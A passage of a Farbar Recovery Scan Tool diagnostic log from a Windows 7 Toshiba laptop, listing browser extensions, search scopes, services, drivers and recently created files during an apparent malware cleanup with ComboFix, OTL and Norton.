
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://start.toshiba.com/

StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe

SearchScopes: HKLM - DefaultScope {2D1389C8-B7A4-42B3-9385-7287A26C0DF5} URL = http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP

SearchScopes: HKLM - {2C284C26-5B06-4DFC-B46C-9D2EA294202A} URL = http://search.live.com/results.aspx?q={searchTerms}&FORM=HPNTDF

SearchScopes: HKLM - {2D1389C8-B7A4-42B3-9385-7287A26C0DF5} URL = http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP

SearchScopes: HKLM - {3F69DA71-DC06-4D09-BEF6-BC86B2EA700C} URL = http://www.ask.com/web?q={searchterms}&l=dis&o=ushpl

SearchScopes: HKLM-x32 - DefaultScope {2D1389C8-B7A4-42B3-9385-7287A26C0DF5} URL = http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP

SearchScopes: HKLM-x32 - {2C284C26-5B06-4DFC-B46C-9D2EA294202A} URL = http://search.live.com/results.aspx?q={searchTerms}&FORM=HPNTDF

SearchScopes: HKLM-x32 - {2D1389C8-B7A4-42B3-9385-7287A26C0DF5} URL = http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP

SearchScopes: HKLM-x32 - {3F69DA71-DC06-4D09-BEF6-BC86B2EA700C} URL = http://www.ask.com/web?q={searchterms}&l=dis&o=ushpl

SearchScopes: HKCU - DefaultScope {2D1389C8-B7A4-42B3-9385-7287A26C0DF5} URL = http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP_enUS476

SearchScopes: HKCU - {2D1389C8-B7A4-42B3-9385-7287A26C0DF5} URL = http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP_enUS476

SearchScopes: HKCU - {3F69DA71-DC06-4D09-BEF6-BC86B2EA700C} URL =

SearchScopes: HKCU - {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = http://nortonsafe.search.ask.com/web?q={SEARCHTERMS}&o=APN10506&l=dis&prt=360&chn=retail&geo=US&ver=21&locale=en_US&gct=kwd&qsrc=2869

SearchScopes: HKCU - {C6375EBC-5C3D-4491-AADA-B48CB13B0238} URL = http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP

BHO: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton 360\Engine64\21.6.0.32\coIEPlg.dll (Symantec Corporation)

BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)

BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)

BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)

BHO: TOSHIBA Media Controller Plug-in -> {F3C88694-EFFA-4d78-B409-54B7B2535B14} -> C:\Program Files (x86)\TOSHIBA\TOSHIBA Media Controller Plug-in\x64\TOSHIBAMediaControllerIE.dll (TOSHIBA Corporation)

BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\coIEPlg.dll (Symantec Corporation)

BHO-x32: Norton Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\IPS\IPSBHO.DLL (Symantec Corporation)

BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)

BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)

BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)

BHO-x32: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)

BHO-x32: TOSHIBA Media Controller Plug-in -> {F3C88694-EFFA-4d78-B409-54B7B2535B14} -> C:\Program Files (x86)\TOSHIBA\TOSHIBA Media Controller Plug-in\TOSHIBAMediaControllerIE.dll (TOSHIBA Corporation)

Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)

Toolbar: HKLM - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton 360\Engine64\21.6.0.32\coIEPlg.dll (Symantec Corporation)

Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)

Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\coIEPlg.dll (Symantec Corporation)

Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)

DPF: HKLM-x32 {02BCC737-B171-4746-94C9-0D8A0B2C0089} http://office.microsoft.com/sites/production/ieawsdc32.cab

DPF: HKLM-x32 {36299202-09EF-4ABF-ADB9-47C599DBE778} https://www.hpwindows7upgrade.arvato.com/north_america/Endcustomer/HPProdDetect.cab

DPF: HKLM-x32 {49232000-16E4-426C-A231-62846947304B} https://wimpro.cce.hp.com/ChatEntry/downloads/sysinfo.cab

DPF: HKLM-x32 {73ECB3AA-4717-450C-A2AB-D00DAD9EE203} http://h20270.www2.hp.com/ediags/gmn2/install/HPProductDetection2.cab

DPF: HKLM-x32 {DF780F87-FF2B-4DF8-92D0-73DB16A1543A} http://zone.msn.com/bingame/popcaploader_v10.cab

DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab

Tcpip\Parameters: [DhcpNameServer] 192.168.1.254

FireFox:

========

FF Plugin: @adobe.com/FlashPlayer -> C:\windows\system32\Macromed\Flash\NPSWF64_15_0_0_152.dll ()

FF Plugin: @microsoft.com/GENUINE -> disabled No File

FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)

FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)

FF Plugin-x32: @adobe.com/FlashPlayer -> C:\windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_152.dll ()

FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()

FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)

FF Plugin-x32: @java.com/JavaPlugin -> C:\Program Files (x86)\Java\jre6\bin\new_plugin\npjp2.dll (Sun Microsystems, Inc.)

FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File

FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)

FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPAUTHZ.DLL (Microsoft Corporation)

FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL (Microsoft Corporation)

FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)

FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3538.0513 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)

FF Plugin-x32: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll No File

FF Plugin-x32: @nosltd.com/getPlus+®,version=1.6.2.102 -> C:\Program Files (x86)\NOS\bin\np_gp.dll No File

FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)

FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)

FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll ()

FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)

FF HKLM-x32\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension

FF HKLM-x32\...\Firefox\Extensions: [{2D3F3651-74B9-4795-BDEC-6DA2F431CB62}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.6.0.32\coFFPlgn

FF Extension: Norton Toolbar - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.6.0.32\coFFPlgn [2014-10-28]

Chrome:

=======

CHR HKLM\...\Chrome\Extension: [mkfokfffehpeedafpekjeddnmnjhmcmk] - C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\Exts\Chrome.crx [2014-10-19]

CHR HKLM-x32\...\Chrome\Extension: [mkfokfffehpeedafpekjeddnmnjhmcmk] - C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\Exts\Chrome.crx [2014-10-19]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R4 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-10-01] (Malwarebytes Corporation)

R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [968504 2014-10-01] (Malwarebytes Corporation)

R2 Motorola Device Manager; C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe [137528 2013-11-15] (Motorola Mobility LLC)

S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [340240 2011-06-01] ()

R2 N360; C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\N360.exe [265040 2014-09-21] (Symantec Corporation)

R2 Norton PC Checkup Application Launcher; C:\Program Files (x86)\PC Checkup\SymcPCCULaunchSvc.exe [132056 2012-11-20] (Symantec Corporation)

R2 PCCUJobMgr; C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.13.11\ccSvcHst.exe [126392 2011-07-19] (Symantec Corporation)

R2 PST Service; C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe [65657 2011-09-02] (Motorola) [File not signed]

R2 Thpsrv; C:\windows\system32\ThpSrv.exe [558592 2011-04-20] (TOSHIBA Corporation) [File not signed]

R2 UDSS; c:\Program Files (x86)\Common Files\Ulead Systems\UDSS\UDSS.exe [30064 2011-03-11] ()

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

U5 AppMgmt; C:\Windows\system32\svchost.exe [27648 2011-03-01] (Microsoft Corporation)

R1 BHDrvx64; C:\Program Files (x86)\Norton 360\NortonData\21.6.0.32\Definitions\BASHDefs\20141024.001\BHDrvx64.sys [1587416 2014-10-03] (Symantec Corporation)

R1 ccSet_N360; C:\Windows\system32\drivers\N360x64\1506000.020\ccSetx64.sys [162392 2014-02-20] (Symantec Corporation)

S2 DgiVecp; C:\windows\system32\Drivers\DgiVecp.sys [54072 2007-08-12] (Samsung Electronics)

S2 DgiVecp; C:\windows\SysWOW64\Drivers\DgiVecp.sys [41984 2007-08-12] (Samsung Electronics Co., Ltd.) [File not signed]

R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [487216 2014-08-26] (Symantec Corporation)

R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [142640 2014-08-26] (Symantec Corporation)

R1 IDSVia64; C:\Program Files (x86)\Norton 360\NortonData\21.6.0.32\Definitions\IPSDefs\20141028.001\IDSvia64.sys [633560 2014-10-17] (Symantec Corporation)

R3 MBAMProtector; C:\windows\system32\drivers\mbam.sys [25816 2014-10-01] (Malwarebytes Corporation)

R3 MBAMSwissArmy; C:\windows\system32\drivers\MBAMSwissArmy.sys [129752 2014-10-29] (Malwarebytes Corporation)

R3 MBAMWebAccessControl; C:\windows\system32\drivers\mwac.sys [63704 2014-10-01] (Malwarebytes Corporation)

S3 MREMP50; C:\Program Files (x86)\Common Files\Motive\MREMP50.sys [21248 2012-12-18] (Printing Communications Assoc., Inc. (PCAUSA)) [File not signed]

R3 NAVENG; C:\Program Files (x86)\Norton 360\NortonData\21.6.0.32\Definitions\VirusDefs\20141028.016\ENG64.SYS [129752 2014-08-11] (Symantec Corporation)

R3 NAVEX15; C:\Program Files (x86)\Norton 360\NortonData\21.6.0.32\Definitions\VirusDefs\20141028.016\EX64.SYS [2137304 2014-08-11] (Symantec Corporation)

R3 SRTSP; C:\Windows\system32\drivers\N360x64\1506000.020\SRTSP64.SYS [876248 2014-08-25] (Symantec Corporation)

R1 SRTSPX; C:\Windows\system32\drivers\N360x64\1506000.020\SRTSPX64.SYS [37592 2014-08-25] (Symantec Corporation)

R0 SymDS; C:\Windows\System32\drivers\N360x64\1506000.020\SYMDS64.SYS [493656 2014-08-25] (Symantec Corporation)

R0 SymEFA; C:\Windows\System32\drivers\N360x64\1506000.020\SYMEFA64.SYS [1148120 2014-08-25] (Symantec Corporation)

R3 SymEvent; C:\windows\system32\Drivers\SYMEVENT64x86.SYS [177752 2014-10-19] (Symantec Corporation)

R1 SymIRON; C:\Windows\system32\drivers\N360x64\1506000.020\Ironx64.SYS [266968 2014-08-06] (Symantec Corporation)

R1 SymNetS; C:\Windows\system32\drivers\N360x64\1506000.020\SYMNETS.SYS [593112 2014-08-25] (Symantec Corporation)

U3 catchme; \??\C:\ComboFix\catchme.sys [X]

S3 motccgpfl; system32\DRIVERS\motccgpfl.sys [X]

S3 MREMP50a64; \??\C:\PROGRA~1\COMMON~1\Motive\MREMP50a64.SYS [X]

S3 MREMPR5; \??\C:\PROGRA~1\COMMON~1\Motive\MREMPR5.SYS [X]

S3 MRENDIS5; \??\C:\PROGRA~1\COMMON~1\Motive\MRENDIS5.SYS [X]

S3 MRESP50; \??\C:\PROGRA~2\COMMON~1\Motive\MRESP50.SYS [X]

S3 MRESP50a64; \??\C:\PROGRA~1\COMMON~1\Motive\MRESP50a64.SYS [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-29 08:13 - 2014-10-29 08:13 - 00139820 _____ () C:\Users\ADH.Heathman-PC\Desktop\OTL.Txt

2014-10-29 08:13 - 2014-10-29 08:13 - 00076484 _____ () C:\Users\ADH.Heathman-PC\Desktop\Extras.Txt

2014-10-29 08:07 - 2014-10-29 08:04 - 00602112 _____ (OldTimer Tools) C:\Users\ADH.Heathman-PC\Desktop\OTL.exe

2014-10-29 07:43 - 2014-10-29 07:43 - 00025100 _____ () C:\ComboFix.txt

2014-10-29 07:08 - 2011-06-26 01:45 - 00256000 _____ () C:\windows\PEV.exe

2014-10-29 07:08 - 2010-11-07 12:20 - 00208896 _____ () C:\windows\MBR.exe

2014-10-29 07:08 - 2009-04-19 23:56 - 00060416 _____ (NirSoft) C:\windows\NIRCMD.exe

2014-10-29 07:08 - 2000-08-30 19:00 - 00518144 _____ (SteelWerX) C:\windows\SWREG.exe

2014-10-29 07:08 - 2000-08-30 19:00 - 00406528 _____ (SteelWerX) C:\windows\SWSC.exe

2014-10-29 07:08 - 2000-08-30 19:00 - 00098816 _____ () C:\windows\sed.exe

2014-10-29 07:08 - 2000-08-30 19:00 - 00080412 _____ () C:\windows\grep.exe

2014-10-29 07:08 - 2000-08-30 19:00 - 00068096 _____ () C:\windows\zip.exe

2014-10-29 07:07 - 2014-10-29 07:44 - 00000000 ____D () C:\Qoobox

2014-10-29 07:06 - 2014-10-29 07:38 - 00000000 ____D () C:\windows\erdnt

2014-10-29 07:05 - 2014-10-29 07:06 - 05591672 ____R (Swearware) C:\Users\ADH.Heathman-PC\Desktop\ComboFix.exe

2014-10-28 22:37 - 2014-10-28 22:37 - 00441854 _____ () C:\Users\Heathman\Documents\cc_20141028_223709.reg

2014-10-28 22:33 - 2014-10-28 22:35 - 04974864 _____ (Piriform Ltd) C:\Users\Heathman\Downloads\ccsetup419.exe

2014-10-28 22:22 - 2014-10-29 09:20 - 00000000 ____D () C:\Users\ADH.Heathman-PC\Desktop\FRST64

2014-10-28 22:04 - 2014-10-29 09:20 - 00000000 ____D () C:\FRST

2014-10-27 17:51 - 2014-10-27 17:54 - 120407800 _____ (Microsoft Corporation) C:\Users\ADH.Heathman-PC\Downloads\msert.exe

2014-10-24 18:49 - 2014-10-29 07:44 - 00000000 ___HD () C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}

2014-10-20 12:22 - 2014-09-04 21:11 - 06584320 _____ (Microsoft Corporation) C:\windows\system32\mstscax.dll

2014-10-20 12:22 - 2014-09-04 20:52 - 05703168 _____ (Microsoft Corporation) C:\windows\SysWOW64\mstscax.dll

2014-10-19 16:51 - 2013-10-01 21:22 - 00056832 _____ (Microsoft Corporation) C:\windows\system32\Drivers\TsUsbFlt.sys

2014-10-19 16:51 - 2013-10-01 21:11 - 00013824 _____ (Microsoft Corporation) C:\windows\system32\TsUsbRedirectionGroupPolicyControl.exe

2014-10-19 16:51 - 2013-10-01 21:08 - 00012800 _____ (Microsoft Corporation) C:\windows\system32\TsUsbRedirectionGroupPolicyExtension.dll

2014-10-19 16:51 - 2013-10-01 20:48 - 00056832 _____ (Microsoft Corporation) C:\windows\system32\MsRdpWebAccess.dll

2014-10-19 16:51 - 2013-10-01 20:48 - 00018944 _____ (Microsoft Corporation) C:\windows\system32\wksprtPS.dll

2014-10-19 16:51 - 2013-10-01 20:29 - 00062976 _____ (Microsoft Corporation) C:\windows\system32\tsgqec.dll

2014-10-19 16:51 - 2013-10-01 20:10 - 00044544 _____ (Microsoft Corporation) C:\windows\system32\TsUsbGDCoInstaller.dll

2014-10-19 16:51 - 2013-10-01 19:15 - 01057280 _____ (Microsoft Corporation) C:\windows\system32\rdvidcrl.dll

2014-10-19 16:51 - 2013-10-01 19:14 - 00050176 _____ (Microsoft Corporation) C:\windows\SysWOW64\MsRdpWebAccess.dll

2014-10-19 16:51 - 2013-10-01 19:14 - 00017920 _____ (Microsoft Corporation) C:\windows\SysWOW64\wksprtPS.dll

2014-10-19 16:51 - 2013-10-01 19:08 - 00083968 _____ (Microsoft Corporation) C:\windows\system32\TSWbPrxy.exe

2014-10-19 16:51 - 2013-10-01 19:01 - 00420864 _____ (Microsoft Corporation) C:\windows\system32\wksprt.exe

2014-10-19 16:51 - 2013-10-01 18:58 - 00053248 _____ (Microsoft Corporation) C:\windows\SysWOW64\tsgqec.dll

2014-10-19 16:51 - 2013-10-01 18:31 - 01147392 _____ (Microsoft Corporation) C:\windows\system32\mstsc.exe

2014-10-19 16:51 - 2013-10-01 18:08 - 00855552 _____ (Microsoft Corporation) C:\windows\SysWOW64\rdvidcrl.dll

2014-10-19 16:51 - 2013-10-01 17:34 - 01068544 _____ (Microsoft Corporation) C:\windows\SysWOW64\mstsc.exe

2014-10-19 16:02 - 2014-10-19 16:02 - 00000000 ____D () C:\windows\System32\Tasks\Norton 360

2014-10-19 16:00 - 2014-10-19 16:00 - 00177752 _____ (Symantec Corporation) C:\windows\system32\Drivers\SYMEVENT64x86.SYS

2014-10-19 16:00 - 2014-10-19 16:00 - 00008222 _____ () C:\windows\system32\Drivers\SYMEVENT64x86.CAT

2014-10-19 16:00 - 2014-10-19 16:00 - 00002402 _____ () C:\Users\Public\Desktop\Norton 360.lnk

2014-10-19 16:00 - 2014-10-19 16:00 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Norton 360

2014-10-19 16:00 - 2014-10-19 16:00 - 00000000 ____D () C:\Program Files (x86)\Norton 360

2014-10-19 15:56 - 2014-10-19 15:56 - 01021968 _____ (Symantec Corporation) C:\Users\Heathman\Downloads\NortonN360Downloader.exe

2014-10-19 15:49 - 2014-09-24 21:08 - 00371712 _____ (Microsoft Corporation) C:\windows\system32\qdvd.dll

2014-10-19 15:49 - 2014-09-24 20:40 - 00519680 _____ (Microsoft Corporation) C:\windows\SysWOW64\qdvd.dll

2014-10-19 15:48 - 2014-10-09 21:05 - 00507392 _____ (Microsoft Corporation) C:\windows\system32\aepdu.dll

2014-10-19 15:48 - 2014-10-09 21:05 - 00276480 _____ (Microsoft Corporation) C:\windows\system32\generaltel.dll

2014-10-19 15:48 - 2014-10-09 21:00 - 00424448 _____ (Microsoft Corporation) C:\windows\system32\aeinv.dll

2014-10-19 15:48 - 2014-09-28 19:58 - 03198976 _____ (Microsoft Corporation) C:\windows\system32\win32k.sys

2014-10-19 15:48 - 2014-09-17 21:00 - 03241472 _____ (Microsoft Corporation) C:\windows\system32\msi.dll

2014-10-19 15:48 - 2014-09-17 20:32 - 02363904 _____ (Microsoft Corporation) C:\windows\SysWOW64\msi.dll

2014-10-19 15:48 - 2014-09-04 00:23 - 00424448 _____ (Microsoft Corporation) C:\windows\system32\rastls.dll

2014-10-19 15:48 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\windows\SysWOW64\rastls.dll

2014-10-19 15:48 - 2014-08-28 21:07 - 03179520 _____ (Microsoft Corporation) C:\windows\system32\rdpcorets.dll

2014-10-19 15:48 - 2014-07-16 21:07 - 00681984 _____ (Microsoft Corporation) C:\windows\system32\termsrv.dll

2014-10-19 15:48 - 2014-07-16 21:07 - 00455168 _____ (Microsoft Corporation) C:\windows\system32\winlogon.exe

2014-10-19 15:48 - 2014-07-16 21:07 - 00235520 _____ (Microsoft Corporation) C:\windows\system32\winsta.dll

2014-10-19 15:48 - 2014-07-16 21:07 - 00150528 _____ (Microsoft Corporation) C:\windows\system32\rdpcorekmts.dll

2014-10-19 15:48 - 2014-07-16 21:07 - 00086528 _____ (Microsoft Corporation) C:\windows\system32\TSpkg.dll

2014-10-19 15:48 - 2014-07-16 21:07 - 00022016 _____ (Microsoft Corporation) C:\windows\system32\credssp.dll

2014-10-19 15:48 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\windows\SysWOW64\winsta.dll

2014-10-19 15:48 - 2014-07-16 20:39 - 00065536 _____ (Microsoft Corporation) C:\windows\SysWOW64\TSpkg.dll

2014-10-19 15:48 - 2014-07-16 20:39 - 00017408 _____ (Microsoft Corporation) C:\windows\SysWOW64\credssp.dll

2014-10-19 15:48 - 2014-07-16 20:21 - 00212480 _____ (Microsoft Corporation) C:\windows\system32\Drivers\rdpwd.sys

2014-10-19 15:48 - 2014-07-16 20:21 - 00039936 _____ (Microsoft Corporation) C:\windows\system32\Drivers\tssecsrv.sys

2014-10-19 15:48 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\windows\system32\KBDYAK.DLL

2014-10-19 15:48 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\windows\system32\KBDTAT.DLL

2014-10-19 15:48 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\windows\system32\KBDRU1.DLL

2014-10-19 15:48 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\windows\system32\KBDBASH.DLL

2014-10-19 15:48 - 2014-07-08 21:03 - 00006656 _____ (Microsoft Corporation) C:\windows\system32\KBDRU.DLL

2014-10-19 15:48 - 2014-07-08 20:31 - 00007168 _____ (Microsoft Corporation) C:\windows\SysWOW64\KBDYAK.DLL

2014-10-19 15:48 - 2014-07-08 20:31 - 00007168 _____ (Microsoft Corporation) C:\windows\SysWOW64\KBDTAT.DLL

2014-10-19 15:48 - 2014-07-08 20:31 - 00006656 _____ (Microsoft Corporation) C:\windows\SysWOW64\KBDRU1.DLL

2014-10-19 15:48 - 2014-07-08 20:31 - 00006656 _____ (Microsoft Corporation) C:\windows\SysWOW64\KBDRU.DLL

2014-10-19 15:48 - 2014-07-08 20:31 - 00006656 _____ (Microsoft Corporation) C:\windows\SysWOW64\KBDBASH.DLL

2014-10-19 15:48 - 2014-07-08 17:38 - 00419992 _____ () C:\windows\system32\locale.nls

2014-10-19 15:48 - 2014-07-08 17:30 - 00419992 _____ () C:\windows\SysWOW64\locale.nls

2014-10-19 15:48 - 2014-06-18 17:23 - 01943696 _____ (Microsoft Corporation) C:\windows\system32\dfshim.dll

2014-10-19 15:48 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\windows\SysWOW64\dfshim.dll

2014-10-19 15:48 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\windows\SysWOW64\mscorier.dll

2014-10-19 15:48 - 2014-06-18 17:23 - 00156312 _____ (Microsoft Corporation) C:\windows\system32\mscorier.dll

2014-10-19 15:48 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\windows\SysWOW64\mscories.dll

2014-10-19 15:48 - 2014-06-18 17:23 - 00073880 _____ (Microsoft Corporation) C:\windows\system32\mscories.dll

2014-10-19 15:47 - 2014-10-19 15:47 - 00896048 _____ () C:\Users\ADH.Heathman-PC\Downloads\Norton_Removal_Tool.exe

2014-10-19 15:45 - 2014-09-20 00:18 - 00051712 _____ (Microsoft Corporation) C:\windows\system32\ie4uinit.exe

2014-10-19 15:45 - 2014-09-20 00:17 - 02236928 _____ (Microsoft Corporation) C:\windows\system32\wininet.dll

2014-10-19 15:45 - 2014-09-20 00:17 - 01407488 _____ (Microsoft Corporation) C:\windows\system32\urlmon.dll

2014-10-19 15:45 - 2014-09-20 00:16 - 19280896 _____ (Microsoft Corporation) C:\windows\system32\mshtml.dll

2014-10-19 15:45 - 2014-09-20 00:16 - 15399424 _____ (Microsoft Corporation) C:\windows\system32\ieframe.dll

2014-10-19 15:45 - 2014-09-20 00:16 - 03959296 _____ (Microsoft Corporation) C:\windows\system32\jscript9.dll

2014-10-19 15:45 - 2014-09-20 00:16 - 02655232 _____ (Microsoft Corporation) C:\windows\system32\iertutil.dll

2014-10-19 15:45 - 2014-09-20 00:16 - 00855552 _____ (Microsoft Corporation) C:\windows\system32\jscript.dll

2014-10-19 15:45 - 2014-09-20 00:16 - 00603136 _____ (Microsoft Corporation) C:\windows\system32\msfeeds.dll

2014-10-19 15:45 - 2014-09-20 00:16 - 00526336 _____ (Microsoft Corporation) C:\windows\system32\ieui.dll

2014-10-19 15:45 - 2014-09-20 00:16 - 00255488 _____ (Microsoft Corporation) C:\windows\system32\iedkcs32.dll

2014-10-19 15:45 - 2014-09-20 00:16 - 00197120 _____ (Microsoft Corporation) C:\windows\system32\msrating.dll

2014-10-19 15:45 - 2014-09-20 00:16 - 00136704 _____ (Microsoft Corporation) C:\windows\system32\iesysprep.dll

2014-10-19 15:45 - 2014-09-20 00:16 - 00097280 _____ (Microsoft Corporation) C:\windows\system32\mshtmled.dll

2014-10-19 15:45 - 2014-09-20 00:16 - 00067072 _____ (Microsoft Corporation) C:\windows\system32\iesetup.dll

2014-10-19 15:45 - 2014-09-20 00:16 - 00053760 _____ (Microsoft Corporation) C:\windows\system32\jsproxy.dll

2014-10-19 15:45 - 2014-09-20 00:16 - 00039936 _____ (Microsoft Corporation) C:\windows\system32\iernonce.dll

2014-10-19 15:45 - 2014-09-20 00:15 - 01508864 _____ (Microsoft Corporation) C:\windows\system32\inetcpl.cpl

